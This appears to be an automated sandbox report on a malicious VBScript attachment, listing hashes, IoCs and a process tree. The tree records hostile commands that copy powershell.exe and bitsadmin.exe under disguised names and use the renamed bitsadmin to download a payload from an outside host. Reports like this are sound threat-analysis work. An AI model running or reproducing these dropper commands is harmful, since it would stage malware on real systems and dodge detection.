a1bfd39eb6057b5797ca04c30d5ca65641585e72ecdfdd8e0c1ac24d126b4056

Analysis

Target

Allegato_doc_BRNLSN65H44H501N.vbs
Size

3KB
MD5

399426adfd02de2e27ebca41608be96e
SHA1

7b7629618e0cf7d4826b6c8c6dceea344233df3b
SHA256

a1bfd39eb6057b5797ca04c30d5ca65641585e72ecdfdd8e0c1ac24d126b4056
SHA512

68db9c58318ddab4dcfee56d08a49bf6cf494a095b1d3a0972ca3ac2167caa063abb5a41e90ba2ed2142cccc19cb7063434503d5d4e95c8141d3145b480a47cd

Score

8^/10

Executes dropped EXE 1 IoCs

Processes:

nUpPg.exe

pid process

1524 nUpPg.exe

pid	process
1524	nUpPg.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 1056 wrote to memory of 792	1056	WScript.exe	cmd.exe
PID 1056 wrote to memory of 792	1056	WScript.exe	cmd.exe
PID 1056 wrote to memory of 792	1056	WScript.exe	cmd.exe
PID 1056 wrote to memory of 1048	1056	WScript.exe	cmd.exe
PID 1056 wrote to memory of 1048	1056	WScript.exe	cmd.exe
PID 1056 wrote to memory of 1048	1056	WScript.exe	cmd.exe
PID 1056 wrote to memory of 1524	1056	WScript.exe	nUpPg.exe
PID 1056 wrote to memory of 1524	1056	WScript.exe	nUpPg.exe
PID 1056 wrote to memory of 1524	1056	WScript.exe	nUpPg.exe
PID 1056 wrote to memory of 1524	1056	WScript.exe	nUpPg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_BRNLSN65H44H501N.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1056
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\znUpPg.exe
  2⤵
  PID:792
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\nUpPg.exe
  2⤵
  PID:1048
- C:\Users\Admin\AppData\Roaming\nUpPg.exe
  "C:\Users\Admin\AppData\Roaming\nUpPg.exe" /transfer AbVPtb /download https://innerearthartistry.com/nerea/BRNLSN65H44H501N/1x1.gif C:\Users\Admin\AppData\Roaming\1x1.gif
  2⤵
  - Executes dropped EXE
  PID:1524